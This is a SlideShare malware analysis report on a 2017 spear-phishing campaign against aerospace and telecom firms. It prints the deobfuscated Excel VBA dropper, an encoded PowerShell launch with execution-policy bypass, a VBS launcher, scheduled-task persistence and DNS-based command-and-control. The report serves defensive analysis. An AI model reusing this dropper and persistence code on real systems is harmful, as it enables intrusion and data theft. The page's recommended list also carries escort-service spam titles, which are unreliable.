SlideShare a Scribd company logo

Iranian Non-malware Fileless Attacks targeting aerospace and telecom

A
AhmedA79

Good Morning, Regard to the news about Iranian Hacking Group Discovered Targeting Aerospace and Telecom. I would like to share Malware analysis report, I created in 2017, about Iranian malware Targeting Aerospace and Telecom. #malware #hacking #aerospace #telecom #pentest #redteam

Technology
1 of 15
Download to read offline
Page 1 of 15 This is an Internal Document and should not be shared with unauthorized users. Iranian Malware analysis report Iranian malware Targeting Aerospace and Telecom in 2017 Author: Ahmed El-fanagely Linkedin: https://www.linkedin.com/in/ahmed-pentest/ VERSION 1.0
ANNUAL REPORT | 2018 3 1 TABLE OF CONTENTS 2
 Executive Summary ........................................................................................................ 4
 3
 ToolSet............................................................................................................................. 4
 4
 MITRE ATT&CK ………...........................................................................0....................... 4
 5
 VBA MACRO ANALYSIS …………..…............................................................................ 5
 6 POWERSHELL MALWARE DEEP DIVE ………............................................................. 10

ANNUAL REPORT | 2018 4 2 EXECUTIVE SUMMARY In this attack, spear phishing was used as the initial infection vector. Before launching the attack, the group studied publicly available information about the targeted organization and identified email addresses belonging to various departments of the company. Email addresses in this department received phishing emails with a malicious Xlsx file. The phishing emails claimed to have urgent HR survey. The phishing emails were carefully crafted and written on behalf of a human resources department. Once the attacker compromise one of employee’s email credential, the attacker starts sending phishing emails to everyone in same department with a malicious xlsx file. The phishing emails claimed to have urgent payment to check xlsx file. The phishing emails were carefully crafted and written on behalf of a victim employee. The attachments received by email were IOC as shown below: File name File format MD5 Hash value TNA.March17.001.xls XLS 2a462cdbaee3b0340bc6298057d83240 3 TOOLSET • Notepad++ • SSView • Olevba 4 MITRE ATT&CK ID Name T1566,001 Phishing: Spearphishing Attachment T1204,002 User Execution: Malicious File T1546,013 Event Triggered Execution: PowerShell Profile T1053,005 Scheduled Task/Job: Scheduled Task T1059,005 Command and Scripting Interpreter: Visual Basic T1071,004 Application Layer Protocol: DNS
ANNUAL REPORT | 2018 5 VBA MACRO ANALYSIS In the event a victim opens the malicious Microsoft Excel spreadsheet attached within the email, This Excel file contains a single spreadsheet, and the spreadsheet contains invoice data. As soon as user click on "Enable content" allowing execution of the first stage of the malware payload. Figure 1 Malicious Excel spreadsheet Let us use the popular oledump and olevba Python scripts, to examine whether the XLS file contains any VBA macros:
ANNUAL REPORT | 2018 6 Let us use the popular olevba Python scripts, to examine whether the XLS file contains any VBA macros: Figure 2 Malicious Excel spreadsheet According to olevba tool, the Excel sheet contain VBA macros. VBA code: Observed the below function that refers to data in the cells. Private Sub Workbook_Open() Call F5615664 End Sub Sub F5615664() On Error Resume Next A4660720 = "wS" & "cri" & "pt." & "Sh" & "ell" I6611623 = "Sc" & "ript" & "ing." & "File" & "Sy" & "stemOb" & "ject" Set U5777083 = CreateObject(A4660720) Set D6945409 = CreateObject(I6611623) W2151843 = U5777083.ExpandEnvironmentStrings("%temp%U1848931.TMP") I2622608 = ActiveWorkbook.Worksheets(1).Cells(37, 27) Set M9383463 = D6945409.OpenTextFile(W2151843, 2, True) M9383463.WriteLine (I2622608) M9383463.Close U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27) K7517347 = "cmd" & ".e" & "xe -e" & "xec b" & "ypas" & "s -E" & "nc " V1380609 = K7517347 & U1808667 U5777083.Run V1380609, 0 ActiveWorkbook.Worksheets(2).Visible = True ActiveWorkbook.Worksheets(3).Visible = True ActiveWorkbook.Worksheets(2).Activate ActiveWorkbook.Worksheets(1).Visible = False ActiveWorkbook.Save End Sub
ANNUAL REPORT | 2018 7 We did not observe any data initially. we pull the extracted Workbook stream into our hex editor Using Windows GUI tool for Structure Storage View SSView. Figure 3 SSView We pull the extracted Workbook stream into our hex editor and reviewed further and observed that there was some obfuscated data, and it was encoded as base64 encode (obfuscation technique) not visible intially. Figure 3 encode base64
ANNUAL REPORT | 2018 8 Find below the De-obfuscated data: (PowerShell script malware) Now decided to debug the Sub function F5615664 using Visual Basic Editor as it was used in the call. We able to get the de-obfuscated data from first two parameters in code A4660720 = "wS" & "cri" & "pt." & "Sh" & "ell" I6611623 = "Sc" & "ript" & "ing." & "File" & "Sy" & "stemOb" & "ject" Result: A4660720 = wScript.Shell I6611623 = "Scripting.FileSystemObject" Observed the below function that refers to data in the cells. W2151843 = U5777083.ExpandEnvironmentStrings("%temp%U1848931.TMP") I2622608 = ActiveWorkbook.Worksheets(1).Cells(37, 27) Set M9383463 = D6945409.OpenTextFile(W2151843, 2, True) M9383463.WriteLine (I2622608) M9383463.Close We found hidden data in these cells as we shown in Figure 3. This data is encoded in base64 and the VBA macro will drop this data info file in “%temp%U1848931.TMP” as shown in below code: W2151843 = U5777083.ExpandEnvironmentStrings("%temp%U1848931.TMP") I2622608 = ActiveWorkbook.Worksheets(1).Cells(37, 27) Set M9383463 = D6945409.OpenTextFile(W2151843, 2, True) M9383463.WriteLine (I2622608) M9383463.Close Then next function will call some data from cells then execute this code U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27) K7517347 = "cmd" & ".e" & "xe -e" & "xec b" & "ypas" & "s -E" & "nc " V1380609 = K7517347 & U1808667
ANNUAL REPORT | 2018 9 U5777083.Run V1380609, 0 the de-obfuscated result: U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27) K7517347 = "cmd.exe -exec bypass -Enc " V1380609 = K7517347 & U1808667 U5777083.Run V1380609, 0 I am using simple function to dump missing data from hidden cells in below: Sub Print_p1_file() Dim strFile_Path As String strFile_Path = "C:UsersUserDesktop p1.txt" Open strFile_Path For Output As #1 I2622638 = ActiveWorkbook.Worksheets(1).Cells(37, 27) Write #1, I2622638 Close #1 End Sub Sub Print_p2_file() Dim strFile_Path As String strFile_Path = "C:UsersUserDesktop p2.txt" Open strFile_Path For Output As #1 U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27) Write #1, U1808667 Close #1 End Sub Result: Result: Now let us decode the code and start Malware Analysis.
ANNUAL REPORT | 2018 10 5 POWERSHELL MALWARE DEEP DIVE the malicious document creates a PowerShell and VBS file and then continues executing the payload by using the following command line parameters. • Malware before profile id path: C:UsersUserAppDataLocalTempU1848931.TMP • malware path: C:UsersUserAppDataLocalMicrosoftWindowsmc.ps1 • VBS path: C:UsersUserAppDataLocalMicrosoftWindowsL69742.vbs • Command Line; please note that the string executes through vbs script: powershell.exe -NoP -sta -NonI -exec bypass -file C:UsersUserappdatalocalmicrosoftWindowsmc.ps1 Figure 4: Infection procedure As soon as the macro executes and launches PowerShell, the malware is dropped and proceeds to a multistage deployment procedure. 1 - PowerShell loader: Create machine id and decode malware file 2: VBS script: Execute malware 3: MC PowerShell malware offers functionality to control infected victims.
ANNUAL REPORT | 2018 11 Let us start analysis PowerShell loader, as we see in below first function responsibility to create a VBS script VBS data after decoding: set wss = CreateObject("WScript.Shell") str = "power" & "sh" & "ell" & ".e" & "xe -NoP -sta -NonI -e" & "xe" & "c byp" & "as" & "s -fi" & "le " path = "#dpath#" str = str + path + "mc.ps1" wss.Run str, 0 Second function, decoding malware code and create machine Id and replaced in the second- stage “ mc.ps1”
ANNUAL REPORT | 2018 12 last function, Responsible for creating scheduled task named “GoogleServiceUpdate” to execute VBS script named “L69742.vbs” every 2 minutes. Let us start analysis PowerShell Malware, MC.ps1 PowerShell malware offers functionality to control infected victims. 1: Create PATH and Folders 2: Reads the HDD data 3: Download and implant additional tools and malware through DNS requests 4: DNS Data exfiltration As we see in below image, The first multiple lines are parameters values, include (script path, download folder, upload folder, machine id, max host length, C2 server) As below image the function is responsible to terminate the PowerShell if the number of execution orders exceeds 4
ANNUAL REPORT | 2018 13 The below function "base32data", which i highlighted are responsible for encoded and decoded before and after communicating with the C2. Now, the below function responsible to create folders “dn” folder and “up” folder. The below function responsible for communicating with the C2 and download file through DNS request using windows “NSLookup.exe” file.
ANNUAL REPORT | 2018 14 let's go deep dive with this function, in first step the DNS request will start with “script will replace “ ([string]$id)” to machine id “40699” then add data Randomly to the DNS request then send the request to C2. If the C2 response back with OK, then the script will continue with the batch file download function. But C2 response back with NO, then the script will continue to the upload file function. as shown in the image below. The C2 will continue to send and receive data through DNS request until the request contains "EOFEOF" which mean the File completed.
ANNUAL REPORT | 2018 15 Thank you

Recommended

Avg Technologies Vawtrak Banking Trojan White Paper
Avg Technologies Vawtrak Banking Trojan White PaperAvg Technologies Vawtrak Banking Trojan White Paper
Avg Technologies Vawtrak Banking Trojan White PaperAVG Technologies
 
Oracle to vb 6.0 connectivity
Oracle to vb 6.0 connectivityOracle to vb 6.0 connectivity
Oracle to vb 6.0 connectivityrohit vishwakarma
 
Feratel mapping technical_notes
Feratel mapping technical_notesFeratel mapping technical_notes
Feratel mapping technical_notesSTIinnsbruck
 
How to remove conduit search and other toolbars — extended guide
How to remove conduit search and other toolbars — extended guideHow to remove conduit search and other toolbars — extended guide
How to remove conduit search and other toolbars — extended guideJudy Halliwell
 
SQL Injection - Newsletter
SQL Injection - NewsletterSQL Injection - Newsletter
SQL Injection - NewsletterSmitha Padmanabhan
 
How "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersHow "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersChema Alonso
 
Time-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesTime-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesChema Alonso
 
Ethical hacking lab series lab 14 understan
Ethical hacking lab series lab 14 understan Ethical hacking lab series lab 14 understan
Ethical hacking lab series lab 14 understanjasmin849794
 

Recommended

Avg Technologies Vawtrak Banking Trojan White Paper
Avg Technologies Vawtrak Banking Trojan White PaperAvg Technologies Vawtrak Banking Trojan White Paper
Avg Technologies Vawtrak Banking Trojan White PaperAVG Technologies
 
Oracle to vb 6.0 connectivity
Oracle to vb 6.0 connectivityOracle to vb 6.0 connectivity
Oracle to vb 6.0 connectivityrohit vishwakarma
 
Feratel mapping technical_notes
Feratel mapping technical_notesFeratel mapping technical_notes
Feratel mapping technical_notesSTIinnsbruck
 
How to remove conduit search and other toolbars — extended guide
How to remove conduit search and other toolbars — extended guideHow to remove conduit search and other toolbars — extended guide
How to remove conduit search and other toolbars — extended guideJudy Halliwell
 
SQL Injection - Newsletter
SQL Injection - NewsletterSQL Injection - Newsletter
SQL Injection - NewsletterSmitha Padmanabhan
 
How "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersHow "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersChema Alonso
 
Time-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesTime-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesChema Alonso
 
Ethical hacking lab series lab 14 understan
Ethical hacking lab series lab 14 understan Ethical hacking lab series lab 14 understan
Ethical hacking lab series lab 14 understanjasmin849794
 
Rootkit case
Rootkit caseRootkit case
Rootkit caseArtem I. Baranov
 
Crisis. advanced malware
Crisis. advanced malwareCrisis. advanced malware
Crisis. advanced malwareYury Chemerkin
 
Micro services from scratch - Part 1
Micro services from scratch - Part 1Micro services from scratch - Part 1
Micro services from scratch - Part 1Azrul MADISA
 
Technical Report Vawtrak v2
Technical Report Vawtrak v2Technical Report Vawtrak v2
Technical Report Vawtrak v2Blueliv
 
PT1420 File Access and Visual Basic .docx
PT1420 File Access and Visual Basic .docxPT1420 File Access and Visual Basic .docx
PT1420 File Access and Visual Basic .docxamrit47
 
I doc packaging and mapping techniques.doc
I doc packaging and mapping techniques.docI doc packaging and mapping techniques.doc
I doc packaging and mapping techniques.docVERUS BRASIL
 
Discussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source ComponentsDiscussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source ComponentsPVS-Studio
 
Cis 247 all i labs
Cis 247 all i labsCis 247 all i labs
Cis 247 all i labsccis224477
 
Case Project 1-1 Defining and Designing a NetworkThe overview.docx
Case Project 1-1 Defining and Designing a NetworkThe overview.docxCase Project 1-1 Defining and Designing a NetworkThe overview.docx
Case Project 1-1 Defining and Designing a NetworkThe overview.docxtidwellveronique
 
Cbse computer science (c++) class 12 board project bank managment system
Cbse computer science (c++) class 12 board project bank managment systemCbse computer science (c++) class 12 board project bank managment system
Cbse computer science (c++) class 12 board project bank managment systempranoy_seenu
 
Merged document
Merged documentMerged document
Merged documentsreeja_16
 
October Patch Tuesday Analysis 2018
October Patch Tuesday Analysis 2018October Patch Tuesday Analysis 2018
October Patch Tuesday Analysis 2018Ivanti
 
Point of-sale-malware-backoff
Point of-sale-malware-backoffPoint of-sale-malware-backoff
Point of-sale-malware-backoffAndrey Apuhtin
 
Point of-sale-malware-backoff
Point of-sale-malware-backoffPoint of-sale-malware-backoff
Point of-sale-malware-backoffEMC
 
A Novel Secure Cloud SAAS Integration for User Authenticated Information
A Novel Secure Cloud SAAS Integration for User Authenticated InformationA Novel Secure Cloud SAAS Integration for User Authenticated Information
A Novel Secure Cloud SAAS Integration for User Authenticated Informationijtsrd
 
Production Debugging at Code Camp Philly
Production Debugging at Code Camp PhillyProduction Debugging at Code Camp Philly
Production Debugging at Code Camp PhillyBrian Lyttle
 
Leture5 exercise onactivities
Leture5 exercise onactivitiesLeture5 exercise onactivities
Leture5 exercise onactivitiesmaamir farooq
 
Lecture exercise on activities
Lecture exercise on activitiesLecture exercise on activities
Lecture exercise on activitiesmaamir farooq
 
Android web service client
Android web service clientAndroid web service client
Android web service clientAravindharamanan S
 
Flask jwt authentication tutorial
Flask jwt authentication tutorialFlask jwt authentication tutorial
Flask jwt authentication tutorialKaty Slemon
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 

More Related Content

Similar to Iranian Non-malware Fileless Attacks targeting aerospace and telecom

Crisis. advanced malware
Crisis. advanced malwareCrisis. advanced malware
Crisis. advanced malwareYury Chemerkin
 
Micro services from scratch - Part 1
Micro services from scratch - Part 1Micro services from scratch - Part 1
Micro services from scratch - Part 1Azrul MADISA
 
Technical Report Vawtrak v2
Technical Report Vawtrak v2Technical Report Vawtrak v2
Technical Report Vawtrak v2Blueliv
 
PT1420 File Access and Visual Basic .docx
PT1420 File Access and Visual Basic .docxPT1420 File Access and Visual Basic .docx
PT1420 File Access and Visual Basic .docxamrit47
 
I doc packaging and mapping techniques.doc
I doc packaging and mapping techniques.docI doc packaging and mapping techniques.doc
I doc packaging and mapping techniques.docVERUS BRASIL
 
Discussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source ComponentsDiscussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source ComponentsPVS-Studio
 
Cis 247 all i labs
Cis 247 all i labsCis 247 all i labs
Cis 247 all i labsccis224477
 
Case Project 1-1 Defining and Designing a NetworkThe overview.docx
Case Project 1-1 Defining and Designing a NetworkThe overview.docxCase Project 1-1 Defining and Designing a NetworkThe overview.docx
Case Project 1-1 Defining and Designing a NetworkThe overview.docxtidwellveronique
 
Cbse computer science (c++) class 12 board project bank managment system
Cbse computer science (c++) class 12 board project bank managment systemCbse computer science (c++) class 12 board project bank managment system
Cbse computer science (c++) class 12 board project bank managment systempranoy_seenu
 
Merged document
Merged documentMerged document
Merged documentsreeja_16
 
October Patch Tuesday Analysis 2018
October Patch Tuesday Analysis 2018October Patch Tuesday Analysis 2018
October Patch Tuesday Analysis 2018Ivanti
 
Point of-sale-malware-backoff
Point of-sale-malware-backoffPoint of-sale-malware-backoff
Point of-sale-malware-backoffAndrey Apuhtin
 
Point of-sale-malware-backoff
Point of-sale-malware-backoffPoint of-sale-malware-backoff
Point of-sale-malware-backoffEMC
 
A Novel Secure Cloud SAAS Integration for User Authenticated Information
A Novel Secure Cloud SAAS Integration for User Authenticated InformationA Novel Secure Cloud SAAS Integration for User Authenticated Information
A Novel Secure Cloud SAAS Integration for User Authenticated Informationijtsrd
 
Production Debugging at Code Camp Philly
Production Debugging at Code Camp PhillyProduction Debugging at Code Camp Philly
Production Debugging at Code Camp PhillyBrian Lyttle
 
Leture5 exercise onactivities
Leture5 exercise onactivitiesLeture5 exercise onactivities
Leture5 exercise onactivitiesmaamir farooq
 
Lecture exercise on activities
Lecture exercise on activitiesLecture exercise on activities
Lecture exercise on activitiesmaamir farooq
 
Flask jwt authentication tutorial
Flask jwt authentication tutorialFlask jwt authentication tutorial
Flask jwt authentication tutorialKaty Slemon
 

Similar to Iranian Non-malware Fileless Attacks targeting aerospace and telecom (20)

Rootkit case
Rootkit caseRootkit case
Rootkit case
 
Crisis. advanced malware
Crisis. advanced malwareCrisis. advanced malware
Crisis. advanced malware
 
Micro services from scratch - Part 1
Micro services from scratch - Part 1Micro services from scratch - Part 1
Micro services from scratch - Part 1
 
Technical Report Vawtrak v2
Technical Report Vawtrak v2Technical Report Vawtrak v2
Technical Report Vawtrak v2
 
PT1420 File Access and Visual Basic .docx
PT1420 File Access and Visual Basic .docxPT1420 File Access and Visual Basic .docx
PT1420 File Access and Visual Basic .docx
 
I doc packaging and mapping techniques.doc
I doc packaging and mapping techniques.docI doc packaging and mapping techniques.doc
I doc packaging and mapping techniques.doc
 
Discussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source ComponentsDiscussing Errors in Unity3D's Open-Source Components
Discussing Errors in Unity3D's Open-Source Components
 
Cis 247 all i labs
Cis 247 all i labsCis 247 all i labs
Cis 247 all i labs
 
Case Project 1-1 Defining and Designing a NetworkThe overview.docx
Case Project 1-1 Defining and Designing a NetworkThe overview.docxCase Project 1-1 Defining and Designing a NetworkThe overview.docx
Case Project 1-1 Defining and Designing a NetworkThe overview.docx
 
Cbse computer science (c++) class 12 board project bank managment system
Cbse computer science (c++) class 12 board project bank managment systemCbse computer science (c++) class 12 board project bank managment system
Cbse computer science (c++) class 12 board project bank managment system
 
Merged document
Merged documentMerged document
Merged document
 
October Patch Tuesday Analysis 2018
October Patch Tuesday Analysis 2018October Patch Tuesday Analysis 2018
October Patch Tuesday Analysis 2018
 
Point of-sale-malware-backoff
Point of-sale-malware-backoffPoint of-sale-malware-backoff
Point of-sale-malware-backoff
 
Point of-sale-malware-backoff
Point of-sale-malware-backoffPoint of-sale-malware-backoff
Point of-sale-malware-backoff
 
A Novel Secure Cloud SAAS Integration for User Authenticated Information
A Novel Secure Cloud SAAS Integration for User Authenticated InformationA Novel Secure Cloud SAAS Integration for User Authenticated Information
A Novel Secure Cloud SAAS Integration for User Authenticated Information
 
Production Debugging at Code Camp Philly
Production Debugging at Code Camp PhillyProduction Debugging at Code Camp Philly
Production Debugging at Code Camp Philly
 
Leture5 exercise onactivities
Leture5 exercise onactivitiesLeture5 exercise onactivities
Leture5 exercise onactivities
 
Lecture exercise on activities
Lecture exercise on activitiesLecture exercise on activities
Lecture exercise on activities
 
Android web service client
Android web service clientAndroid web service client
Android web service client
 
Flask jwt authentication tutorial
Flask jwt authentication tutorialFlask jwt authentication tutorial
Flask jwt authentication tutorial
 

Recently uploaded

Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 

Recently uploaded (20)

Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 

Iranian Non-malware Fileless Attacks targeting aerospace and telecom

  • 1. Page 1 of 15 This is an Internal Document and should not be shared with unauthorized users. Iranian Malware analysis report Iranian malware Targeting Aerospace and Telecom in 2017 Author: Ahmed El-fanagely Linkedin: https://www.linkedin.com/in/ahmed-pentest/ VERSION 1.0
  • 2.
  • 3. ANNUAL REPORT | 2018 3 1 TABLE OF CONTENTS 2
 Executive Summary ........................................................................................................ 4
 3
 ToolSet............................................................................................................................. 4
 4
 MITRE ATT&CK ………...........................................................................0....................... 4
 5
 VBA MACRO ANALYSIS …………..…............................................................................ 5
 6 POWERSHELL MALWARE DEEP DIVE ………............................................................. 10

  • 4. ANNUAL REPORT | 2018 4 2 EXECUTIVE SUMMARY In this attack, spear phishing was used as the initial infection vector. Before launching the attack, the group studied publicly available information about the targeted organization and identified email addresses belonging to various departments of the company. Email addresses in this department received phishing emails with a malicious Xlsx file. The phishing emails claimed to have urgent HR survey. The phishing emails were carefully crafted and written on behalf of a human resources department. Once the attacker compromise one of employee’s email credential, the attacker starts sending phishing emails to everyone in same department with a malicious xlsx file. The phishing emails claimed to have urgent payment to check xlsx file. The phishing emails were carefully crafted and written on behalf of a victim employee. The attachments received by email were IOC as shown below: File name File format MD5 Hash value TNA.March17.001.xls XLS 2a462cdbaee3b0340bc6298057d83240 3 TOOLSET • Notepad++ • SSView • Olevba 4 MITRE ATT&CK ID Name T1566,001 Phishing: Spearphishing Attachment T1204,002 User Execution: 